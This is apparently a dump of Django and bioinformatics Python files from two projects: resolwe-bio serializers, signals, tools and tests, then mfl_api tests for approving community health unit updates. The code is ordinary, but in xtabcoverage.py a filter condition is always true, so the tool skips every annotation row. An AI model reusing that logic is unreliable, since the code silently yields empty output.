class PresampleSerializer(CollectionSerializer):
"""Serializer for presample."""
collections = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
class Meta(CollectionSerializer.Meta):
"""Serializer configuration."""
model = Sample
fields = CollectionSerializer.Meta.fields + ('collections', 'presample')
```
#### File: resolwe-bio/resolwe_bio/signals.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from django.db.models.signals import pre_delete, post_save
from django.dispatch import receiver
from guardian import shortcuts
from resolwe.flow.models import Data, DescriptorSchema, iterate_schema
from .models import Sample
@receiver(post_save, sender=Data)
def add_post_save_handler(sender, instance, **kwargs):
"""Add object to flow_collection.
* Only add `Data object` to `Sample` if process has defined
`flow_collwection` field.
* Add object to existing `Sample`, if `input objects` that
belong to `flow collection` (but not necessary all
`input objects`), are part of the same `Sample`.
* If `input objects` belong to different `Samples` or do not belong
to any `Sample`, create new `Sample`.
Collect IDs of all `input objects`.
"""
if kwargs['created'] and instance.process.flow_collection:
input_objects = []
for field_schema, fields, _ in iterate_schema(instance.input, instance.process.input_schema, ''):
if 'name' in field_schema and 'type' in field_schema and field_schema['name'] in fields:
field = fields[field_schema['name']]
if field_schema['type'].startswith('data:'):
input_objects.append(field)
if field_schema['type'].startswith('list:data:'):
input_objects.extend(field)
sample_query = Sample.objects.filter(data__id__in=input_objects).distinct()
if sample_query.count() == 1:
sample = sample_query.first()
else:
des_schema = DescriptorSchema.objects.get(slug=instance.process.flow_collection)
sample = Sample.objects.create(
contributor=instance.contributor,
descriptor_schema=des_schema,
name=instance.name,
)
for permission in list(zip(*sample._meta.permissions))[0]: # pylint: disable=protected-access
shortcuts.assign_perm(permission, sample.contributor, sample)
# XXX: This doesn't work, because signal is triggered before Data
# object is added to collections.
# for collection in Collection.objects.filter(data=instance.pk):
# sample.collections.add(collection)
sample.data.add(instance)
@receiver(pre_delete, sender=Data)
def add_pre_delete_handler(sender, instance, **kwargs):
"""Delete Sample when last Data object is deleted."""
try:
sample = Sample.objects.get(data=instance.pk)
except Sample.DoesNotExist: # pylint: disable=no-member
return
if sample.data.count() == 1: # last Data object will be just deleted
sample.delete()
```
#### File: tests/processes/test_enrichment.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class EnrichmentProcessorTestCase(BioProcessTestCase):
def test_go_enrichment_dicty(self):
inputs = {'src': 'ontology_dicty_cropped.obo.gz'}
ontology = self.run_process('upload-obo', inputs)
inputs = {'src': 'gaf_dicty_cropped.gz'}
annotation = self.run_process('upload-gaf', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'pval_threshold': 1,
'genes': ['DDB_G0277589', 'DDB_G0286855', 'DDB_G0267640']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_dicty.json.gz')
inputs = {'src': 'purpureum_ortholog-10-28-2014.cropped.txt.gz'}
orthologues = self.run_process('upload-orthologues', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'orthologues': orthologues.pk,
'pval_threshold': 1,
'genes': ['DPU_G0074602', 'DDB_G0286855', 'DPU_G0074318']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_dicty.json.gz')
def test_go_enrichment_mouse(self):
inputs = {'src': 'ontology_mus_cropped.obo.gz'}
ontology = self.run_process('upload-obo', inputs)
inputs = {'src': 'gaf_mgi_cropped.gz'}
annotation = self.run_process('upload-gaf', inputs)
inputs = {
'ontology': ontology.pk,
'gaf': annotation.pk,
'pval_threshold': 1,
'genes': ['MGI:1929646', 'MGI:107486']}
enrichment = self.run_process('goenrichment-bcm', inputs)
self.assertJSON(enrichment, enrichment.output['terms'], '', 'go_enriched_terms_mouse.json.gz')
```
#### File: tests/processes/test_geneinfo.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class GIProcessorTestCase(BioProcessTestCase):
def test_gi(self):
inputs = {'src': 'mouse_gene_info.txt'}
self.run_process("upload-geneinfo", inputs)
```
#### File: tests/processes/test_reads_manipulation.py
```python
from resolwe_bio.utils.test import BioProcessTestCase
class ReadsProcessorTestCase(BioProcessTestCase):
def test_merge_reads(self):
reads = self.prepare_reads()
reads2 = self.prepare_reads()
inputs = {
'reads_1': reads.pk,
'reads_2': reads2.pk}
merged_reads = self.run_process('reads-merge', inputs)
self.assertFiles(merged_reads, 'fastq', ['paired_end_forward.fastq.gz'], compression='gzip')
self.assertFiles(merged_reads, 'fastq2', ['paired_end_reverse.fastq.gz'], compression='gzip')
self.assertFields(merged_reads, "fastqc_url", [{'file': 'fastqc/fw_reads_fastqc/fastqc_report.html',
'refs': ['fastqc/fw_reads_fastqc'],
'size': 311414}])
self.assertFields(merged_reads, "fastqc_url2", [{'file': 'fastqc/rw_reads_fastqc/fastqc_report.html',
'refs': ['fastqc/rw_reads_fastqc'],
'size': 311414}])
```
#### File: tests/unit/test_presample.py
```python
from __future__ import absolute_import, division, print_function, unicode_literals
from django.contrib.auth import get_user_model
from django.core.urlresolvers import reverse
from rest_framework.test import APITestCase, APIRequestFactory, force_authenticate
from rest_framework import status
from resolwe_bio.models import Sample
from resolwe_bio.views import SampleViewSet, PresampleViewSet
class PresampleTestCase(APITestCase):
def setUp(self):
self.user = get_user_model().objects.create(username='user', is_superuser=True)
self.sample = Sample.objects.create(contributor=self.user, name="Test sample")
sample_viewset = SampleViewSet()
self.sample_queryset = sample_viewset.get_queryset()
presample_viewset = PresampleViewSet()
self.presample_queryset = presample_viewset.get_queryset()
detail_url_mapping = {
'get': 'retrieve',
'put': 'update',
'patch': 'partial_update',
'delete': 'destroy',
}
list_url_mapping = {
'get': 'list',
'post': 'create',
}
self.detail_sample_view = SampleViewSet.as_view(detail_url_mapping)
self.detail_presample_view = PresampleViewSet.as_view(detail_url_mapping)
self.list_sample_view = SampleViewSet.as_view(list_url_mapping)
self.list_presample_view = PresampleViewSet.as_view(list_url_mapping)
self.factory = APIRequestFactory()
@staticmethod
def get_detail_url(endpoint, pk):
return reverse('resolwebio-api:{}-detail'.format(endpoint), kwargs={'pk': pk})
@staticmethod
def get_list_url(endpoint):
return reverse('resolwebio-api:{}-list'.format(endpoint))
def test_querysets(self):
self.assertEqual(self.sample_queryset.count(), 0)
self.assertEqual(self.presample_queryset.count(), 1)
self.sample.presample = False # mark sample as annotated
self.sample.save()
self.assertEqual(self.sample_queryset.count(), 1)
self.assertEqual(self.presample_queryset.count(), 0)
def test_upgrade_presample(self):
"""`Presample` can be transformed into `Sample`"""
url = self.get_detail_url('presample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_presample_view(request, pk=self.sample.pk)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
def test_create_presample(self):
"""Test create `Presample`"""
url = self.get_list_url('presample')
request = self.factory.post(url, {'name': 'New presample'}, format='json')
force_authenticate(request, user=self.user)
response = self.list_presample_view(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
presample = Sample.objects.last()
self.assertEqual(presample.name, 'New presample')
self.assertEqual(presample.presample, True)
def test_create_sample(self):
"""Test create `Sample`"""
url = self.get_list_url('sample')
request = self.factory.post(url, {'name': 'New sample'}, format='json')
force_authenticate(request, user=self.user)
response = self.list_sample_view(request)
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
sample = Sample.objects.last()
self.assertEqual(sample.name, 'New sample')
self.assertEqual(sample.presample, False)
def test_revert_sample(self):
"""`Sample` cannot be reverted back in to `Presample`"""
self.sample.presample = False
self.sample.save()
url = self.get_detail_url('sample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_sample_view(request, pk=self.sample.pk)
# `response.content` is "A server error occurred.", but this is OK,
# because request is treated as request with no data (after `presample`
# is removed). This is the reason for status code 204.
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
def test_wrong_endpoint(self):
"""`Sample` cannot be changed through `Presample` endpoint"""
self.sample.presample = False
self.sample.save()
url = self.get_detail_url('presample', self.sample.pk)
request = self.factory.patch(url, {'presample': False}, format='json')
force_authenticate(request, user=self.user)
response = self.detail_presample_view(request, pk=self.sample.pk)
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.sample.refresh_from_db()
self.assertFalse(self.sample.presample)
```
#### File: resolwe_bio/tools/genehcluster.py
```python
from __future__ import absolute_import, division, print_function
import argparse
import json
import numpy as np
from scipy.stats import spearmanr
from scipy.spatial.distance import pdist, squareform
# Import before Orange to avoid namespace conflicts
import utils
from Orange.clustering.hierarchical import HierarchicalClustering, AVERAGE, SINGLE, COMPLETE
from Orange.core import SymMatrix
parser = argparse.ArgumentParser(description='Hierarchical clustering of expression time courses.')
parser.add_argument('etc_files', nargs='+', help='etc files')
parser.add_argument('-e', '--expids', nargs='+', default=[], help='experiment ids')
parser.add_argument('-g', '--genes', nargs='+', default=[], help='subset of gene ids')
parser.add_argument('-d', '--dstfunc', default='pearson', help='distance function')
parser.add_argument('-l', '--linkage', default='average', help='clustering linkage function')
args = parser.parse_args()
distance_map = {
'spearman': lambda m: 0.5 - spearmanr(m, axis=1)[0] / 2.,
'pearson': lambda m: 0.5 - np.corrcoef(m) / 2.,
'euclidean': lambda m: squareform(pdist(m, 'euclidean')),
'manhattan': lambda m: squareform(pdist(m, 'cityblock')),
}
linkage_map = {
'average': AVERAGE,
'single': SINGLE,
'complete': COMPLETE
}
if args.dstfunc not in distance_map:
raise ValueError("Invalid distance function {}".format(args.dstfunc))
if args.linkage not in linkage_map:
raise ValueError("Invalid clustering linkage function {}".format(args.linkage))
if not args.expids or len(args.expids) != len(args.etc_files):
raise ValueError("Number of experiment ids must match the number of files")
etcs = []
timepoints = set()
# read data
for i, fname in enumerate(args.etc_files):
etcjson = json.load(utils.gzopen(fname))
tps = etcjson['etc']['timePoints']
expid = args.expids[i]
if not all(tps[i] <= tps[i + 1] for i in range(len(tps) - 1)):
raise ValueError("Timepoints should be ordered")
etc = {'genes': {}, 'experiment': expid, 'timePoints': np.array(tps)}
timepoints.update(tps)
for gene in args.genes:
if gene in etcjson['etc']['genes']:
etc['genes'][gene] = np.array(etcjson['etc']['genes'][gene])
etcs.append(etc)
timepoints = np.array(sorted(timepoints))
series, info = [], []
# interpolate missing timepoints
for etc in etcs:
if not np.array_equal(timepoints, etc['timePoints']):
for gene, points in etc['genes'].iteritems():
series.append(np.interp(timepoints, etc['timePoints'], points))
info.append((gene, etc['experiment']))
else:
for gene, points in etc['genes'].iteritems():
series.append(points)
info.append((gene, etc['experiment']))
matrix = distance_map[args.dstfunc](np.array(series))
matrix[np.isnan(matrix)] = np.nanmax(matrix)
matrix[matrix < 0] = 0.
matrix = SymMatrix([list(x) for x in matrix])
clustering = HierarchicalClustering()
clustering.linkage = linkage_map[args.linkage]
clustering.overwrite_matrix = 1
root = clustering(matrix)
def dendrogram(cluster):
"""Generate dendrogram structure."""
res = {}
q = [[cluster, res], ]
while len(q) > 0:
old, new = q.pop(0)
if old.branches:
new['left'] = {}
new['right'] = {}
new['height'] = old.height
q.append([old.left, new['left']])
q.append([old.right, new['right']])
else:
new['height'] = old.height
new['gene'] = info[old[0]][0]
new['experiment'] = info[old[0]][1]
return res
dend = dendrogram(root)
print(json.dumps({'clustering': {'tree': dend}}, separators=(',', ':')))
```
#### File: resolwe_bio/tools/xtabcoverage.py
```python
from __future__ import absolute_import, division, print_function
import argparse
import csv
import re
import sys
import utils
parser = argparse.ArgumentParser(
description='Create BEDGRAPH coverage file for a tab file w.r.t. given GFF3 annotations.')
parser.add_argument('--tab', dest='tab_file', help='Tab file')
parser.add_argument('--tab-coverage-col', dest='tab_col_val', help='Tab column with coverage value')
parser.add_argument('--gff3', dest='gff3_file', help='GFF3 file')
args = parser.parse_args()
# Fetch gene ids and their expressions from tab file
with utils.gzopen(args.tab_file) as f:
rdr = csv.reader(f, delimiter='\t')
rdr.next() # skip header
tab_vals = {row[0]: float(row[int(args.tab_col_val)]) for row in rdr}
genes = {}
# Fetch gene regions and chromosomes they belong to
with open(args.gff3_file, 'r') as f:
rdr = csv.reader(f, delimiter='\t')
gene_id_regex = re.compile(r'ID=([A-Za-z0-9_]+);')
for i, row in enumerate(rdr):
# skip GFF3 headers
if row[0][0:2] == '##':
continue
# skip if not mRNA
if row[2] != 'mRNA' or row[2] != 'transcript':
continue
gene_id = gene_id_regex.search(row[8])
if gene_id is None:
print("No gene id found in line %d" % i)
sys.exit(1)
else:
gene_id = gene_id.groups()[0]
region = (int(row[3]), int(row[4]))
if gene_id in genes:
genes[gene_id]['regions'].append(region)
else:
genes[gene_id] = {
'regions': [region],
'chr': row[0]
}
# Create a bedgraph (still with overlapping regions)
bedgraph = []
for gid in set(genes.keys()) & set(tab_vals.keys()): # pylint: disable=consider-iterating-dictionary
if tab_vals[gid] == 0.0:
continue
expr_level = tab_vals[gid]
for region in sorted(genes[gid]['regions']):
bed_data = (genes[gid]['chr'], region[0], region[1], expr_level, gid)
bedgraph.append(bed_data)
bedgraph.sort(key=lambda t: (t[0], int(t[1]), int(t[2])))
# Flatten regions that overlap
last_reg_idx = len(bedgraph) - 1
unique_regions = []
i = 0
while i <= last_reg_idx:
overlap_reg_chr = bedgraph[i][0]
overlap_reg_start = bedgraph[i][1]
overlap_reg_end = bedgraph[i][2]
# working index set - indices of those regions that overlap in some continuous region
ws_idxs = [i]
j = i + 1
while j <= last_reg_idx and bedgraph[j][1] <= overlap_reg_end and bedgraph[j][0] == overlap_reg_chr:
ws_idxs.append(j)
overlap_reg_end = max(overlap_reg_end, bedgraph[j][2])
i = j
j += 1
def which_start(point):
"""Return indices of regions with $point as starting point."""
return [_idx for _idx in ws_idxs if bedgraph[_idx][1] == point]
def which_end(point):
"""Return indices of regions with $point as ending point."""
return [_idx for _idx in ws_idxs if bedgraph[_idx][2] == point]
if len(ws_idxs) > 1:
starts = [bedgraph[_idx][1] for _idx in ws_idxs]
ends = [bedgraph[_idx][2] for _idx in ws_idxs]
points = list(set(starts + ends))
# active index set - regions that are active in the current working index set for a given point p
# (that is, p lies in all regions whose indices are in the active set)
active_idxs = []
def active_expr_avg():
"""Compute average expression."""
return sum(bedgraph[_idx][3] for _idx in active_idxs) / len(active_idxs)
# Crunch overlapping regions into unique, flat parts.
prev_p = None
for p in sorted(points):
start_idx = which_start(p)
end_idx = which_end(p)
n_start = len(start_idx)
n_end = len(end_idx)
# current point is a starting point of some region(s) A and an ending point of some other region(s) B
#
# mandatory ASCII art:
#
# A: --------------------
# B: -------------------------
# C: --------------------------------
# ^ ^
# prev_p p
#
# |-----------------|| <---- created unique & flat regions
# flat_1 flat_2
#
if n_start > 0 and n_end > 0:
unique_regions.append((overlap_reg_chr, prev_p, p - 1, active_expr_avg())) # flat_1
active_idxs = list(set(active_idxs + start_idx))
unique_regions.append((overlap_reg_chr, p, p, active_expr_avg())) # flat_2
active_idxs = [idx for idx in active_idxs if idx not in end_idx]
prev_p = p + 1
# current point is a starting point of some region(s)
#
# mandatory ASCII art:
#
# A: ---------------------------
# B: -----------------------
# C: ------------------------------
# ^ ^
# prev_p p
#
# |---------------|
# flat_1
#
elif n_start > 0:
if prev_p is not None:
unique_regions.append((overlap_reg_chr, prev_p, p - 1, active_expr_avg()))
active_idxs = list(set(active_idxs + start_idx))
prev_p = p
# current point is an ending point of some region(s)
#
# mandatory ASCII art:
#
# A: ---------------------
# B: ---------------
# C: --------------------------
# ^ ^
# prev_p p
#
# |-----|
# flat_1
#
elif n_end > 0:
unique_regions.append((overlap_reg_chr, prev_p, p, active_expr_avg()))
active_idxs = [idx for idx in active_idxs if idx not in end_idx]
prev_p = p + 1
else:
# No overlapping for this feature; can be safely added to unique regions.
unique_regions.append((overlap_reg_chr, overlap_reg_start, overlap_reg_end, bedgraph[i][3]))
i += 1
print('\n'.join('\t'.join(map(str, bg_line[0:4])) for bg_line in unique_regions))
sys.exit(0)
```
|
{
"source": "Jenks18/mfl_api",
"score": 2
}
|
#### File: chul/tests/test_updates.py
```python
from django.core.urlresolvers import reverse
from common.tests.test_views import LoginMixin
from common.models import ContactType, Contact
from rest_framework.test import APITestCase
from model_mommy import mommy
from facilities.models import Facility
from ..models import (
CommunityHealthUnit,
ChuUpdateBuffer,
Status,
CommunityHealthWorker,
CommunityHealthUnitContact)
class TestCHUpdatesApproval(LoginMixin, APITestCase):
def setUp(self):
self.url = reverse("api:chul:community_health_units_list")
self.approve_url = reverse("api:chul:chu_updatebufers_list")
super(TestCHUpdatesApproval, self).setUp()
def test_updates_chu_not_approved(self):
chu = mommy.make(CommunityHealthUnit)
name = '<NAME>'
data = {
"name": name,
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(chu_refetched.name, name)
self.assertEquals(0, ChuUpdateBuffer.objects.count())
def test_updates_chu_approved(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
name = '<NAME>'
data = {
"name": name,
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertNotEquals(chu_refetched.name, name)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNone(update.contacts)
self.assertIsNone(update.workers)
def test_update_and_approve_basic_details(self):
facility = mommy.make(Facility)
status = mommy.make(Status)
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
name = '<NAME>'
data = {
"name": name,
"facility": str(facility.id),
"status": str(status.id)
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertNotEquals(chu_refetched.name, name)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(chu_refetched.name, name)
self.assertEquals(chu_refetched.facility, facility)
self.assertEquals(chu_refetched.status, status)
def test_update_and_approve_chews(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_update_contacts(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
data = {
'contacts': contacts
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNotNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
def test_all_updates_combined(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
name = '<NAME>'
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
date_established = "2015-09-23"
date_operational = "2015-10-25"
data = {
'contacts': contacts,
'health_unit_workers': chews,
'name': name,
'date_established': date_established,
'date_operational': date_operational
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNotNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(2, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(name, chu_refetched.name)
self.assertEquals(
date_established,
chu_refetched.date_established.isoformat())
self.assertEquals(
date_operational, chu_refetched.date_operational.isoformat())
def test_reject_updates(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
name = '<NAME>'
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "385235725"
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725"
}
]
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
}
]
date_established = "2015-09-23"
date_operational = "2015-10-25"
data = {
'contacts': contacts,
'health_unit_workers': chews,
'name': name,
'date_established': date_established,
'date_operational': date_operational
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertIsNotNone(update.basic)
self.assertIsNotNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_rejected": False
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(0, CommunityHealthUnitContact.objects.count())
self.assertEquals(0, CommunityHealthUnitContact.objects.filter(
health_unit=chu_refetched).count())
self.assertEquals(0, CommunityHealthWorker.objects.count())
self.assertEquals(0, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
self.assertNotEquals(name, chu_refetched.name)
self.assertNotEquals(date_established, chu_refetched.date_established)
self.assertNotEquals(date_operational, chu_refetched.date_operational)
def test_approve_chew_updates_with_ids(self):
chu = mommy.make(CommunityHealthUnit)
chew_1 = mommy.make(CommunityHealthWorker, health_unit=chu)
chew_2 = mommy.make(CommunityHealthWorker, health_unit=chu)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
"id": str(chew_1.id),
'is_incharge': True,
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
'is_incharge': False,
"id": str(chew_2.id)
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_approve_chew_updates_with_ids_no_id_no_and_is_incharge(self):
chu = mommy.make(CommunityHealthUnit)
chew_1 = mommy.make(CommunityHealthWorker, health_unit=chu)
chew_2 = mommy.make(CommunityHealthWorker, health_unit=chu)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
"id": str(chew_1.id),
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
"id": str(chew_2.id)
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_approve_chew_updates_without_ids(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
chews = [
{
"first_name": "<NAME>",
"last_name": "<NAME>",
'is_incharge': True,
},
{
"first_name": "<NAME>",
"last_name": "<NAME> ya <NAME>",
'is_incharge': False,
}
]
data = {
'health_unit_workers': chews
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNone(update.contacts)
self.assertIsNotNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthWorker.objects.count())
self.assertEquals(2, CommunityHealthWorker.objects.filter(
health_unit=chu_refetched).count())
def test_contacts_with_ids(self):
chu = mommy.make(CommunityHealthUnit)
chu.is_approved = True
chu.save()
contact_type = mommy.make(ContactType)
contact_type_2 = mommy.make(ContactType)
contact_1 = mommy.make(
Contact, contact="3852357254", contact_type=contact_type)
contact_2 = mommy.make(
Contact, contact="385235725", contact_type=contact_type_2)
chu_contact_1 = mommy.make(
CommunityHealthUnitContact, health_unit=chu, contact=contact_1)
chu_contact_2 = mommy.make(
CommunityHealthUnitContact, health_unit=chu, contact=contact_2)
contacts = [
{
"contact_type": str(contact_type.id),
"contact": "3852357254",
"contact_type_name": contact_type.name,
"contact_id": str(contact_1.id),
"id": str(chu_contact_1.id)
},
{
"contact_type": str(contact_type_2.id),
"contact": "385235725",
"contact_type_name": contact_type_2.name,
"contact_id": str(contact_2.id),
"id": str(chu_contact_2.id)
}
]
data = {
'contacts': contacts
}
url = self.url + "{}/".format(chu.id)
response = self.client.patch(url, data)
self.assertEquals(200, response.status_code)
chu_refetched = CommunityHealthUnit.objects.get(id=chu.id)
self.assertEquals(2, CommunityHealthUnitContact.objects.count())
self.assertEquals(1, ChuUpdateBuffer.objects.count())
update = ChuUpdateBuffer.objects.all()[0]
self.assertIsNotNone(update.health_unit)
self.assertEquals(update.basic, '{}')
self.assertIsNotNone(update.contacts)
self.assertIsNone(update.workers)
approve_update_url = self.approve_url + "{}/".format(update.id)
approve_data = {
"is_approved": True
}
response = self.client.patch(approve_update_url, approve_data)
self.assertEquals(200, response.status_code)
